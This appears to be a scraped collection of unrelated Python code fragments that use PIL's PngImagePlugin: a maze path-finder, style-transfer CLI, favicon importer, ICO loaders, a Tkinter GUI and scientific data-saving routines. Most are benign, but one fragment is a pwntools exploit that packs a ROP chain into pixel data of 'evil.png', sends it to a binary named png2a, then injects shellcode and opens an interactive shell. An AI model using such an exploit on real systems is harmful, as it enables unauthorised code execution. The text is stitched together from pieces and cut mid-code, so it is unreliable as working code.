self.openlist[i].g=item.g print ("no path found!") return False # 准备地图数据 f=PngImagePlugin.PngImageFile(r'maze.png') # 将maze转为数组形式存入m m,line=[],[] for y in range(f.size[1]): for x in range(f.size[0]): if f.getpixel((x,y))==(255,255,255,255): line.append('#') # 白色为墙壁 else: line.append('.') # 其他为通路 m.append(''.join(line)) del line[:] # 调用A*算法找路 t=AStarTest(len(m[0]),len(m),m) t.getPath(639,0,1,640,(0,0,255,255))
def main(): """CLI interface for style transfer.""" global ARGS, RUN, STATS ARGS = parse_args(STATE) setup_exceptions() print_args() start_time = timer() now = datetime.now() RUN = '%02d%02d%02d_%02d%02d%02d' % \ (now.year % 100, now.month, now.day, now.hour, now.minute, now.second) STATS = StatLogger() print_('Run %s started.' % RUN) if MKL_THREADS is not None: print_('MKL detected, %d threads maximum.' % MKL_THREADS) os.environ['GLOG_minloglevel'] = '2' if ARGS.caffe_path: sys.path.append(ARGS.caffe_path + '/python') if Path(ARGS.model).name in ('vgg16.prototxt', 'vgg16_avgpool.prototxt'): shapes = VGG16_SHAPES elif Path(ARGS.model).name in ('vgg19.prototxt', 'vgg19_avgpool.prototxt'): shapes = VGG19_SHAPES else: print_('Loading %s.' % ARGS.weights) resp_q = CTX.Queue() CTX.Process(target=init_model, args=(resp_q, ARGS.caffe_path, ARGS.model, ARGS.weights, ARGS.mean)).start() shapes = resp_q.get() print_('Initializing %s.' % ARGS.weights) model = CaffeModel(ARGS.model, ARGS.weights, ARGS.mean, shapes=shapes, placeholder=True) transfer = StyleTransfer(model) if ARGS.list_layers: print_('Layers:') for layer, shape in model.shapes.items(): print_('% 25s %s' % (layer, shape)) sys.exit(0) content_image = Image.open(ARGS.content_image).convert('RGB') style_images = [] for image in ARGS.style_images: style_images.append(Image.open(image).convert('RGB')) initial_image, aux_image = None, None if ARGS.init_image: initial_image = Image.open(ARGS.init_image).convert('RGB') if ARGS.aux_image: aux_image = Image.open(ARGS.aux_image).convert('RGB') cli, cli_resp = None, None if ARGS.prompt: cli = prompt.Prompt(RUN, STATE) cli_resp = prompt.PromptResponder(cli.q, ARGS) server_address = ('', ARGS.port) url = 'http://127.0.0.1:%d/' % ARGS.port server = ProgressServer(server_address, ProgressHandler) server.transfer = transfer server.hidpi = ARGS.hidpi progress_args = {} if ARGS.display == 'browser' and 'no_browser' not in ARGS: progress_args['url'] = url steps = 0 server.progress = Progress(transfer, steps=steps, save_every=ARGS.save_every, cli=cli, callback=cli_resp, **progress_args) th = threading.Thread(target=server.serve_forever) th.daemon = True th.start() print_('\nWatch the progress at: %s\n' % url) np.random.seed(ARGS.seed) try: transfer.transfer_multiscale([content_image], style_images, initial_image, aux_image, callback=server.progress) except (EOFError, KeyboardInterrupt): print_() finally: if ARGS.prompt: cli.stop() STATS.dump() if transfer.current_output: output_image = ARGS.output_image if not output_image: output_image = RUN + '_out.png' print_('Saving output as %s.' % output_image) png_info = PngImagePlugin.PngInfo() png_info.add_itxt('Comment', get_image_comment()) transfer.current_output.save(output_image, pnginfo=png_info) time_spent = timer() - start_time print_('Run %s ending after %dm %.3fs.' % (RUN, time_spent // 60, time_spent % 60))
class IconImporter(object): def __init__(self, feed, page_data=None, force=False): self.feed = feed self.force = force self.page_data = page_data self.feed_icon = MFeedIcon.get_feed(feed_id=self.feed.pk) def save(self): if not self.force and self.feed.favicon_not_found: # print 'Not found, skipping...' return if (not self.force and not self.feed.favicon_not_found and self.feed_icon.icon_url and self.feed.s3_icon): # print 'Found, but skipping...' return if 'facebook.com' in self.feed.feed_address: image, image_file, icon_url = self.fetch_facebook_image() else: image, image_file, icon_url = self.fetch_image_from_page_data() if not image: image, image_file, icon_url = self.fetch_image_from_path( force=self.force) if image: image = self.normalize_image(image) try: color = self.determine_dominant_color_in_image(image) except IndexError: return except MemoryError: return try: image_str = self.string_from_image(image) except TypeError: return if len(image_str) > 500000: image = None if (image and (self.force or self.feed_icon.data != image_str or self.feed_icon.icon_url != icon_url or self.feed_icon.not_found or (settings.BACKED_BY_AWS.get('icons_on_s3') and not self.feed.s3_icon))): logging.debug( " ---> [%-30s] ~SN~FBIcon difference:~FY color:%s (%s/%s) data:%s url:%s notfound:%s no-s3:%s" % (self.feed.log_title[:30], self.feed_icon.color != color, self.feed_icon.color, color, self.feed_icon.data != image_str, self.feed_icon.icon_url != icon_url, self.feed_icon.not_found, settings.BACKED_BY_AWS.get('icons_on_s3') and not self.feed.s3_icon)) self.feed_icon.data = image_str self.feed_icon.icon_url = icon_url self.feed_icon.color = color self.feed_icon.not_found = False self.feed_icon.save() if settings.BACKED_BY_AWS.get('icons_on_s3'): self.save_to_s3(image_str) if self.feed.favicon_color != color: self.feed.favicon_color = color self.feed.favicon_not_found = False self.feed.save( update_fields=['favicon_color', 'favicon_not_found']) if not image: self.feed_icon.not_found = True self.feed_icon.save() self.feed.favicon_not_found = True self.feed.save() return not self.feed.favicon_not_found def save_to_s3(self, image_str): expires = datetime.datetime.now() + datetime.timedelta(days=60) expires = expires.strftime("%a, %d %b %Y %H:%M:%S GMT") k = Key(settings.S3_CONN.get_bucket(settings.S3_ICONS_BUCKET_NAME)) k.key = self.feed.s3_icons_key k.set_metadata('Content-Type', 'image/png') k.set_metadata('Expires', expires) k.set_contents_from_string(image_str.decode('base64')) k.set_acl('public-read') self.feed.s3_icon = True self.feed.save() def load_icon(self, image_file, index=None): ''' DEPRECATED Load Windows ICO image. See http://en.wikipedia.org/w/index.php?oldid=264332061 for file format description. Cribbed and modified from http://djangosnippets.org/snippets/1287/ ''' try: image_file.seek(0) header = struct.unpack('<3H', image_file.read(6)) except Exception, e: return # Check magic if header[:2] != (0, 1): return # Collect icon directories directories = [] for i in xrange(header[2]): directory = list(struct.unpack('<4B2H2I', image_file.read(16))) for j in xrange(3): if not directory[j]: directory[j] = 256 directories.append(directory) if index is None: # Select best icon directory = max(directories, key=operator.itemgetter(slice(0, 3))) else: directory = directories[index] # Seek to the bitmap data image_file.seek(directory[7]) prefix = image_file.read(16) image_file.seek(-16, 1) if PngImagePlugin._accept(prefix): # Windows Vista icon with PNG inside try: image = PngImagePlugin.PngImageFile(image_file) except IOError: return else: # Load XOR bitmap try: image = BmpImagePlugin.DibImageFile(image_file) except IOError: return if image.mode == 'RGBA': # Windows XP 32-bit color depth icon without AND bitmap pass else: # Patch up the bitmap height image.size = image.size[0], image.size[1] >> 1 d, e, o, a = image.tile[0] image.tile[0] = d, (0, 0) + image.size, o, a # Calculate AND bitmap dimensions. See # http://en.wikipedia.org/w/index.php?oldid=264236948#Pixel_storage # for description offset = o + a[1] * image.size[1] stride = ((image.size[0] + 31) >> 5) << 2 size = stride * image.size[1] # Load AND bitmap image_file.seek(offset) string = image_file.read(size) mask = Image.frombytes('1', image.size, string, 'raw', ('1;I', stride, -1)) image = image.convert('RGBA') image.putalpha(mask) return image
def load_icon(_imgPath, index=None): if isinstance(_imgPath, basestring): file = open(_imgPath, 'rb') try: header = struct.unpack('<3H', file.read(6)) except: raise IOError('Not an ICO file') # Check magic try: if header[:2] != (0, 1): raise IOError('Not an ICO file') except: return loadPNG(_imgPath) # Collect icon directories directories = [] for i in xrange(header[2]): directory = list(struct.unpack('<4B2H2I', file.read(16))) for j in xrange(3): if not directory[j]: directory[j] = 256 directories.append(directory) if index is None: # Select best icon directory = max(directories, key=operator.itemgetter(slice(0, 3))) else: directory = directories[index] # Seek to the bitmap data file.seek(directory[7]) prefix = file.read(16) file.seek(-16, 1) if PngImagePlugin._accept(prefix): # Windows Vista icon with PNG inside image = PngImagePlugin.PngImageFile(file) else: # Load XOR bitmap image = BmpImagePlugin.DibImageFile(file) if image.mode == 'RGBA': # Windows XP 32-bit color depth icon without AND bitmap pass else: # Patch up the bitmap height image.size = image.size[0], image.size[1] >> 1 d, e, o, a = image.tile[0] image.tile[0] = d, (0, 0) + image.size, o, a # Calculate AND bitmap dimensions. See offset = o + a[1] * image.size[1] stride = ((image.size[0] + 31) >> 5) << 2 size = stride * image.size[1] # Load AND bitmap file.seek(offset) string = file.read(size) mask = Image.frombytes('1', image.size, string, 'raw', ('1;I', stride, -1)) image = image.convert('RGBA') image.putalpha(mask) return image, image.size
syscall """).ljust(0x10, '\x00') shell = u64(x[:8]) shell8 = u64(x[8:]) payload = "\x00" * 0x1ff638 + flat( 0x405c54, 0xa, 0x401ad8, 0x412000, 0x404985, 0x1000, 0x4123e5, 0x7, 0x40a7c5, 0x403eeb, 0x412c36, 0x405c54, shell, 0x04084cc, 0, 0x403eeb, 0x412c36 + 8, 0x405c54, shell8, 0x04084cc, 0, 0x405c54, 0x3c, 0x40a7c5) print len(payload) < h * w * 4 payload = map(ord, payload.ljust(h * w * 4, '\x00')) data = np.asarray(payload, dtype=np.uint8).reshape((h, w, 4)) img = Image.fromarray(data, 'RGBA') info = PngImagePlugin.PngInfo() info.add_text("TXT", "VALUE") img.save('evil.png', pnginfo=info) r = process(["./png2a"]) IMAGE = 'evil.png' data = open(IMAGE).read() r.send(p32(len(data)) + p32(4 * 53) + p32(0x9a9)) r.recvrepeat(2) r.send(data) r.recvrepeat(2) r.send(p64(0x412c36)) r.recvrepeat(2) r.send("\x90" * 0x30 + asm(shellcraft.sh())) r.interactive()
def createWidgets(self): # fm1 self.fm1 = Frame(self, bg='black') self.titleLabel = Label(self.fm1, text="testing system", font=('微软雅黑', 64), fg="white", bg='black') self.titleLabel.pack() self.fm1.pack(side=TOP, expand=YES, fill='x', pady=20) # fm2 self.fm2 = Frame(self, bg='black') self.fm2_left = Frame(self.fm2, bg='black') self.fm2_right = Frame(self.fm2, bg='black') self.fm2_left_top = Frame(self.fm2_left, bg='black') self.fm2_left_bottom = Frame(self.fm2_left, bg='black') self.predictEntry = Entry(self.fm2_left_top, font=('微软雅黑', 24), width='72', fg='#FF4081') self.predictButton = Button(self.fm2_left_top, text='predict sentence', bg='#FF4081', fg='white', font=('微软雅黑', 36), width='16', command=self.output_predict_sentence) self.predictButton.pack(side=LEFT) self.predictEntry.pack(side=LEFT, fill='y', padx=20) self.fm2_left_top.pack(side=TOP, fill='x') self.truthEntry = Entry(self.fm2_left_bottom, font=('微软雅黑', 24), width='72', fg='#22C9C9') self.truthButton = Button(self.fm2_left_bottom, text='ground truth', bg='#22C9C9', fg='white', font=('微软雅黑', 36), width='16', command=self.output_ground_truth) self.truthButton.pack(side=LEFT) self.truthEntry.pack(side=LEFT, fill='y', padx=20) self.fm2_left_bottom.pack(side=TOP, pady=10, fill='x') self.fm2_left.pack(side=LEFT, padx=60, pady=20, expand=YES, fill='x') # self.nextVideoImg= ImageTk.PhotoImage(file = '/home/hl/Desktop/lovelyqian/nextVideo.png') self.nextVideoButton = Button(self.fm2_right, image='', text='next video', bg='black', command=self.start_play_video_thread) self.nextVideoButton.pack(expand=YES, fill=BOTH) self.fm2_right.pack(side=RIGHT, padx=60) self.fm2.pack(side=TOP, expand=YES, fill="x") # fm3 self.fm3 = Frame(self, bg='black') load = Image.open('/home/jun/Firefox_wallpaper.png') initIamge = PngImagePlugin.PngImageFile( file='/home/jun/Firefox_wallpaper.png') #ImageTk.PhotoImage(load) self.panel = Label(self.fm3, image=initIamge) self.panel.image = initIamge self.panel.pack() self.fm3.pack(side=TOP, expand=YES, fill=BOTH, pady=10)
def save_image(session, path, format_name, width=None, height=None, supersample=3, pixel_size=None, transparent_background=False, quality=95): ''' Save an image of the current graphics window contents. ''' from chimerax.core.errors import UserError, LimitationError has_graphics = session.main_view.render is not None if not has_graphics: raise LimitationError( "Unable to save images because OpenGL rendering is not available") from os.path import dirname, exists dir = dirname(path) if dir and not exists(dir): raise UserError('Directory "%s" does not exist' % dir) if pixel_size is not None: if width is not None or height is not None: raise UserError( 'Cannot specify width or height if pixel_size is given') v = session.main_view b = v.drawing_bounds() if b is None: raise UserError( 'Cannot specify use pixel_size option when nothing is shown') psize = v.pixel_size(b.center()) if psize > 0 and pixel_size > 0: f = psize / pixel_size w, h = v.window_size from math import ceil width, height = int(ceil(f * w)), int(ceil(f * h)) else: raise UserError( 'Pixel size option (%g) and screen pixel size (%g) must be positive' % (pixel_size, psize)) from chimerax.core.session import standard_metadata std_metadata = standard_metadata() metadata = {} if format_name == 'PNG': metadata['optimize'] = True # if dpi is not None: # metadata['dpi'] = (dpi, dpi) if session.main_view.render.opengl_context.pixel_scale() == 2: metadata['dpi'] = (144, 144) from PIL import PngImagePlugin pnginfo = PngImagePlugin.PngInfo() # tags are from <https://www.w3.org/TR/PNG/#11textinfo> def add_text(keyword, value): try: b = value.encode('latin-1') except UnicodeEncodeError: pnginfo.add_itxt(keyword, value) else: pnginfo.add_text(keyword, b) # add_text('Title', description) add_text('Creation Time', std_metadata['created']) add_text('Software', std_metadata['generator']) add_text('Author', std_metadata['creator']) add_text('Copy' 'right', std_metadata['dateCopyrighted']) metadata['pnginfo'] = pnginfo elif format_name == 'TIFF': # metadata['compression'] = 'lzw:2' # metadata['description'] = description metadata['software'] = std_metadata['generator'] # TIFF dates are YYYY:MM:DD HH:MM:SS (local timezone) import datetime as dt metadata['date_time'] = dt.datetime.now().strftime('%Y:%m:%d %H:%M:%S') metadata['artist'] = std_metadata['creator'] # TIFF copy right is ASCII, so no Unicode symbols cp = std_metadata['dateCopyrighted'] if cp[0] == '\N{COPYRIGHT SIGN}': cp = 'Copy' 'right' + cp[1:] metadata['copy' 'right'] = cp # if units == 'pixels': # dpi = None # elif units in ('points', 'inches'): # metadata['resolution unit'] = 'inch' # metadata['x resolution'] = dpi # metadata['y resolution'] = dpi # elif units in ('millimeters', 'centimeters'): # adjust = convert['centimeters'] / convert['inches'] # dpcm = dpi * adjust # metadata['resolution unit'] = 'cm' # metadata['x resolution'] = dpcm # metadata['y resolution'] = dpcm elif format_name == 'JPEG': metadata['quality'] = quality # if dpi is not None: # # PIL's jpeg_encoder requires integer dpi values # metadata['dpi'] = (int(dpi), int(dpi)) # TODO: create exif with metadata using piexif package? # metadata['exif'] = exif view = session.main_view view.render.make_current() max_size = view.render.max_framebuffer_size() if max_size and ((width is not None and width > max_size) or (height is not None and height > max_size)): raise UserError( 'Image size %d x %d too large, exceeds maximum OpenGL render buffer size %d' % (width, height, max_size)) i = view.image(width, height, supersample=supersample, transparent_background=transparent_background) if i is not None: try: i.save(path, format_name, **metadata) except PermissionError: from chimerax.core.errors import UserError raise UserError('Permission denied writing file %s' % path) else: msg = "Unable to save image" if width is not None: msg += ', width %d' % width if height is not None: msg += ', height %d' % height session.logger.warning(msg)
def save_hdf5_data(self, data_dict, attributes=None, filepath=None, filelabel=None, filename=None, timestamp=None, plotfig=None): """ Function used to save the data in hdf5 format. Data is a dictionary of data and metadata. The dictionary key corresponds to the hdf5 file key, so it follows a POSIX-style hierarchy with /-separators. @param data_dict: A dictionary containing the hdf5 dataset names and the data. The data need to be lists or numpy.ndarray @param attributes: A dictionary containning the dataset attibutes. Each attribute item needs to be a dictionary. @param filepath: An optional argument to give the name of the filepath. Default is module name. @param filelabel: An optional parameter is module name. Default is module name. @param filename: An optional parameter to set the file name. Default is timestamp + module name. @param timestamp: An optional parameter which sets the timestamp. Default is the date-time at saving. @param plotfig: a 2D-array which provides an optional saved figure. """ start_time = time.time() if timestamp is None: timestamp = datetime.datetime.now() # try to trace back the functioncall to the class which was calling it. try: frm = inspect.stack()[1] # this will get the object, which called the save_data function. mod = inspect.getmodule(frm[0]) # that will extract the name of the class. module_name = mod.__name__.split('.')[-1] except: # Sometimes it is not possible to get the object which called the save_data function # (such as when calling this from the console). module_name = 'UNSPECIFIED' # determine proper file path if filepath is None: filepath = self.get_path_for_module(module_name) elif not os.path.exists(filepath): os.makedirs(filepath) self.log.info( 'Custom filepath does not exist. Created directory "{0}"' ''.format(filepath)) # create filelabel if none has been passed if filelabel is None: filelabel = module_name if self.active_poi_name != '': filelabel = self.active_poi_name.replace(' ', '_') + '_' + filelabel #TODO: change default file naming, the time stamp is useless since now it's # stored in the data attributes if filename is None: filename = timestamp.strftime('%Y%m%d-%H%M-%S' + '_' + filelabel + '.h5') with h5py.File(os.path.join(filepath, filename), 'w') as h5file: for dset_name, data in data_dict.items(): if isinstance(data, (list, np.ndarray)): dset = h5file.create_dataset(dset_name, shape=data.shape, dtype=data.dtype, data=data) else: self.log.info( "The data you passed for {} are not an array, the corresponding dataset will not" "be created.".format(dset_name)) dset.attrs['timestamp'] = timestamp.strftime( '%Y-%m-%d, %H:%M:%S') if (attributes is not None) and (dset_name in attributes): if not isinstance(attributes, (dict, OrderedDict)): self.log.info( "The attributes need to be a dictionary, the saving of the attributes of {}" "has been aborted".format(dset_name)) else: for attr_name, attr in attributes.items(): dset.attrs[attr_name] = attr if plotfig is not None: # create Metadata metadata = dict() metadata['Title'] = 'Image produced by qudi: ' + module_name metadata['Author'] = 'qudi - Software Suite' metadata[ 'Subject'] = 'Find more information on: https://github.com/Ulm-IQO/qudi' metadata[ 'Keywords'] = 'Python 3, Qt, experiment control, automation, measurement, software, framework, modular' metadata['Producer'] = 'qudi - Software Suite' if timestamp is not None: metadata['CreationDate'] = timestamp metadata['ModDate'] = timestamp else: metadata['CreationDate'] = time metadata['ModDate'] = time if self.save_pdf: # determine the PDF-Filename fig_fname_vector = os.path.join(filepath, filename)[:-4] + '_fig.pdf' # Create the PdfPages object to which we will save the pages: # The with statement makes sure that the PdfPages object is closed properly at # the end of the block, even if an Exception occurs. with PdfPages(fig_fname_vector) as pdf: pdf.savefig(plotfig, bbox_inches='tight', pad_inches=0.05) # We can also set the file's metadata via the PdfPages object: pdf_metadata = pdf.infodict() for x in metadata: pdf_metadata[x] = metadata[x] if self.save_png: # determine the PNG-Filename and save the plain PNG fig_fname_image = os.path.join(filepath, filename)[:-4] + '_fig.png' plotfig.savefig(fig_fname_image, bbox_inches='tight', pad_inches=0.05) # Use Pillow (an fork for PIL) to attach metadata to the PNG png_image = Image.open(fig_fname_image) png_metadata = PngImagePlugin.PngInfo() # PIL can only handle Strings, so let's convert our times metadata['CreationDate'] = metadata['CreationDate'].strftime( '%Y%m%d-%H%M-%S') metadata['ModDate'] = metadata['ModDate'].strftime( '%Y%m%d-%H%M-%S') for x in metadata: # make sure every value of the metadata is a string if not isinstance(metadata[x], str): metadata[x] = str(metadata[x]) # add the metadata to the picture png_metadata.add_text(x, metadata[x]) # save the picture again, this time including the metadata png_image.save(fig_fname_image, "png", pnginfo=png_metadata) # close matplotlib figure plt.close(plotfig) self.log.debug( 'Time needed to save data: {0:.2f}s'.format(time.time() - start_time))
def test_getchunks(self): im = hopper() chunks = PngImagePlugin.getchunks(im) assert len(chunks) == 3
def polish(filename, w, h, hash="", viewhash=""): print(" Polishing...") try: img = Image.open(filename) img = img.convert("RGBA") pixdata = img.load() # Read top left pixel color - not robust to zoomed in images # tlc = pixdata[0,0] # init clipping bounds x1 = img.size[0] x2 = 0 y1 = img.size[1] y2 = 0 # Set background to white and transparent for y in xrange(img.size[1]): solidx = 0 solidy = 0 for x in xrange(img.size[0]): if pixdata[x, y] == bkc: pixdata[x, y] = (255, 255, 255, 0 if PolishTransparentBackground else 255) else: if solidx == 0 and x < x1: x1 = x if solidy == 0 and y < y1: y1 = y solidx = x solidy = y if solidx > x2: x2 = solidx if solidy > y2: y2 = solidy x2 += 2 y2 += 2 # downsample (half the res) img = img.resize((w, h), Image.ANTIALIAS) # crop if (x1 < x2 and y1 < y2 and PolishCrop): img = img.crop((x1/2,y1/2,x2/2,y2/2)) # add hash to meta data meta = PngImagePlugin.PngInfo() # copy metadata into new object #for k,v in im.info.iteritems(): # if k in reserved: continue meta.add_text("csghash", hash, 0) meta.add_text("viewhash", viewhash, 0) # Save it img.save(filename, "PNG", pnginfo=meta) img.close() except: print(" Exception error", sys.exc_info()[0])
def save_data(self, data, filepath=None, parameters=None, filename=None, filelabel=None, timestamp=None, filetype='text', fmt='%.15e', delimiter='\t', plotfig=None): """ General save routine for data. @param dictionary data: Dictionary containing the data to be saved. The keys should be strings containing the data header/description. The corresponding items are one or more 1D arrays or one 2D array containing the data (list or numpy.ndarray). Example: data = {'Frequency (MHz)': [1,2,4,5,6]} data = {'Frequency': [1, 2, 4], 'Counts': [234, 894, 743, 423]} data = {'Frequency (MHz),Counts':[[1,234], [2,894],...[30,504]]} @param string filepath: optional, the path to the directory, where the data will be saved. If the specified path does not exist yet, the saving routine will try to create it. If no path is passed (default filepath=None) the saving routine will create a directory by the name of the calling module inside the daily data directory. If no calling module can be inferred and/or the requested path can not be created the data will be saved in a subfolder of the daily data directory called UNSPECIFIED @param dictionary parameters: optional, a dictionary with all parameters you want to save in the header of the created file. @parem string filename: optional, if you really want to fix your own filename. If passed, the whole file will have the name <filename> If nothing is specified the save logic will generate a filename either based on the module name from which this method was called, or it will use the passed filelabel if that is speficied. You also need to specify the ending of the filename! @parem string filelabel: optional, if filelabel is set and no filename was specified, the savelogic will create a name which looks like YYYY-MM-DD_HHh-MMm-SSs_<filelabel>.dat The timestamp will be created at runtime if no user defined timestamp was passed. @param datetime timestamp: optional, a datetime.datetime object. You can create this object with datetime.datetime.now() in the calling module if you want to fix the timestamp for the filename. Be careful when passing a filename and a timestamp, because then the timestamp will be ignored. @param string filetype: optional, the file format the data should be saved in. Valid inputs are 'text', 'xml' and 'npz'. Default is 'text'. @param string or list of strings fmt: optional, format specifier for saved data. See python documentation for "Format Specification Mini-Language". If you want for example save a float in scientific notation with 6 decimals this would look like '%.6e'. For saving integers you could use '%d', '%s' for strings. The default is '%.15e' for numbers and '%s' for str. If len(data) > 1 you should pass a list of format specifiers; one for each item in the data dict. If only one specifier is passed but the data arrays have different data types this can lead to strange behaviour or failure to save right away. @param string delimiter: optional, insert here the delimiter, like '\n' for new line, '\t' for tab, ',' for a comma ect. 1D data ======= 1D data should be passed in a dictionary where the data trace should be assigned to one identifier like {'<identifier>':[list of values]} {'Numbers of counts':[1.4, 4.2, 5, 2.0, 5.9 , ... , 9.5, 6.4]} You can also pass as much 1D arrays as you want: {'Frequency (MHz)':list1, 'signal':list2, 'correlations': list3, ...} 2D data ======= 2D data should be passed in a dictionary where the matrix like data should be assigned to one identifier like {'<identifier>':[[1,2,3],[4,5,6],[7,8,9]]} which will result in: <identifier> 1 2 3 4 5 6 7 8 9 YOU ARE RESPONSIBLE FOR THE IDENTIFIER! DO NOT FORGET THE UNITS FOR THE SAVED TIME TRACE/MATRIX. """ start_time = time.time() # Create timestamp if none is present if timestamp is None: timestamp = datetime.datetime.now() # Try to cast data array into numpy.ndarray if it is not already one # Also collect information on arrays in the process and do sanity checks found_1d = False found_2d = False multiple_dtypes = False arr_length = [] arr_dtype = [] max_row_num = 0 max_line_num = 0 for keyname in data: # Cast into numpy array if not isinstance(data[keyname], np.ndarray): try: data[keyname] = np.array(data[keyname]) except: self.log.error( 'Casting data array of type "{0}" into numpy.ndarray failed. ' 'Could not save data.'.format(type(data[keyname]))) return -1 # determine dimensions if data[keyname].ndim < 3: length = data[keyname].shape[0] arr_length.append(length) if length > max_line_num: max_line_num = length if data[keyname].ndim == 2: found_2d = True width = data[keyname].shape[1] if max_row_num < width: max_row_num = width else: found_1d = True max_row_num += 1 else: self.log.error( 'Found data array with dimension >2. Unable to save data.') return -1 # determine array data types if len(arr_dtype) > 0: if arr_dtype[-1] != data[keyname].dtype: multiple_dtypes = True arr_dtype.append(data[keyname].dtype) # Raise error if data contains a mixture of 1D and 2D arrays if found_2d and found_1d: self.log.error( 'Passed data dictionary contains 1D AND 2D arrays. This is not allowed. ' 'Either fit all data arrays into a single 2D array or pass multiple 1D ' 'arrays only. Saving data failed!') return -1 # try to trace back the functioncall to the class which was calling it. try: frm = inspect.stack()[1] # this will get the object, which called the save_data function. mod = inspect.getmodule(frm[0]) # that will extract the name of the class. module_name = mod.__name__.split('.')[-1] except: # Sometimes it is not possible to get the object which called the save_data function # (such as when calling this from the console). module_name = 'UNSPECIFIED' # determine proper file path if filepath is None: filepath = self.get_path_for_module(module_name) elif not os.path.exists(filepath): os.makedirs(filepath) self.log.info( 'Custom filepath does not exist. Created directory "{0}"' ''.format(filepath)) # determine proper unique filename to save if none has been passed if filename is None: filename = self.get_filename(filelabel, timestamp) # Check format specifier. if not isinstance(fmt, str) and len(fmt) != len(data): self.log.error( 'Length of list of format specifiers and number of data items differs. ' 'Saving not possible. Please pass exactly as many format specifiers as ' 'data arrays.') return -1 # Create header string for the file header = 'Saved Data from the class {0} on {1}.\n' \ ''.format(module_name, timestamp.strftime('%d.%m.%Y at %Hh%Mm%Ss')) if self._file_tag != None: header += '{}\n'.format(self._file_tag) header += '\nParameters:\n===========\n\n' # Include the active POI name (if not empty) as a parameter in the header if self.active_poi_name != '': header += 'Measured at POI: {0}\n'.format(self.active_poi_name) if self.notes != None: header += 'Notes: {}\n'.format(self.notes) # add the parameters if specified: if parameters is not None: # check whether the format for the parameters have a dict type: if isinstance(parameters, dict): if isinstance(self._additional_parameters, dict): parameters = {**self._additional_parameters, **parameters} for entry, param in parameters.items(): if isinstance(param, float): header += '{0}: {1:.16e}\n'.format(entry, param) else: header += '{0}: {1}\n'.format(entry, param) # make a hardcore string conversion and try to save the parameters directly: else: self.log.error( 'The parameters are not passed as a dictionary! The SaveLogic will ' 'try to save the parameters nevertheless.') header += 'not specified parameters: {0}\n'.format(parameters) header += '\nData:\n=====\n' # write data to file # FIXME: Implement other file formats # write to textfile if filetype == 'text': # Reshape data if multiple 1D arrays have been passed to this method. # If a 2D array has been passed, reformat the specifier if len(data) != 1: identifier_str = '' if multiple_dtypes: field_dtypes = list( zip([ 'f{0:d}'.format(i) for i in range(len(arr_dtype)) ], arr_dtype)) new_array = np.empty(max_line_num, dtype=field_dtypes) for i, keyname in enumerate(data): identifier_str += keyname + delimiter field = 'f{0:d}'.format(i) length = data[keyname].size new_array[field][:length] = data[keyname] if length < max_line_num: if isinstance(data[keyname][0], str): new_array[field][length:] = 'nan' else: new_array[field][length:] = np.nan else: new_array = np.empty([max_line_num, max_row_num], arr_dtype[0]) for i, keyname in enumerate(data): identifier_str += keyname + delimiter length = data[keyname].size new_array[:length, i] = data[keyname] if length < max_line_num: if isinstance(data[keyname][0], str): new_array[length:, i] = 'nan' else: new_array[length:, i] = np.nan # discard old data array and use new one data = {identifier_str: new_array} elif found_2d: keyname = list(data.keys())[0] identifier_str = keyname.replace(', ', delimiter).replace( ',', delimiter) data[identifier_str] = data.pop(keyname) else: identifier_str = list(data)[0] header += list(data)[0] self.save_array_as_text(data=data[identifier_str], filename=filename, filepath=filepath, fmt=fmt, header=header, delimiter=delimiter, comments='#', append=False) # write npz file and save parameters in textfile elif filetype == 'npz': header += str(list(data.keys()))[1:-1] np.savez_compressed(filepath + '/' + filename[:-4], **data) self.save_array_as_text(data=[], filename=filename[:-4] + '_params.dat', filepath=filepath, fmt=fmt, header=header, delimiter=delimiter, comments='#', append=False) else: self.log.error( 'Only saving of data as textfile and npz-file is implemented. Filetype "{0}" is not ' 'supported yet. Saving as textfile.'.format(filetype)) self.save_array_as_text(data=data[identifier_str], filename=filename, filepath=filepath, fmt=fmt, header=header, delimiter=delimiter, comments='#', append=False) #-------------------------------------------------------------------------------------------- # Save thumbnail figure of plot if plotfig is not None: # create Metadata metadata = dict() metadata['Title'] = 'Image produced by qudi: ' + module_name metadata['Author'] = 'qudi - Software Suite' metadata[ 'Subject'] = 'Find more information on: https://github.com/Ulm-IQO/qudi' metadata[ 'Keywords'] = 'Python 3, Qt, experiment control, automation, measurement, software, framework, modular' metadata['Producer'] = 'qudi - Software Suite' if timestamp is not None: metadata['CreationDate'] = timestamp metadata['ModDate'] = timestamp else: metadata['CreationDate'] = time metadata['ModDate'] = time if self.save_pdf: # determine the PDF-Filename fig_fname_vector = os.path.join(filepath, filename)[:-4] + '_fig.pdf' # Create the PdfPages object to which we will save the pages: # The with statement makes sure that the PdfPages object is closed properly at # the end of the block, even if an Exception occurs. with PdfPages(fig_fname_vector) as pdf: pdf.savefig(plotfig, bbox_inches='tight', pad_inches=0.05) # We can also set the file's metadata via the PdfPages object: pdf_metadata = pdf.infodict() for x in metadata: pdf_metadata[x] = metadata[x] if self.save_png: # determine the PNG-Filename and save the plain PNG fig_fname_image = os.path.join(filepath, filename)[:-4] + '_fig.png' plotfig.savefig(fig_fname_image, bbox_inches='tight', pad_inches=0.05) # Use Pillow (an fork for PIL) to attach metadata to the PNG png_image = Image.open(fig_fname_image) png_metadata = PngImagePlugin.PngInfo() # PIL can only handle Strings, so let's convert our times metadata['CreationDate'] = metadata['CreationDate'].strftime( '%Y%m%d-%H%M-%S') metadata['ModDate'] = metadata['ModDate'].strftime( '%Y%m%d-%H%M-%S') for x in metadata: # make sure every value of the metadata is a string if not isinstance(metadata[x], str): metadata[x] = str(metadata[x]) # add the metadata to the picture png_metadata.add_text(x, metadata[x]) # save the picture again, this time including the metadata png_image.save(fig_fname_image, "png", pnginfo=png_metadata) # close matplotlib figure plt.close(plotfig) self.log.debug( 'Time needed to save data: {0:.2f}s'.format(time.time() - start_time))
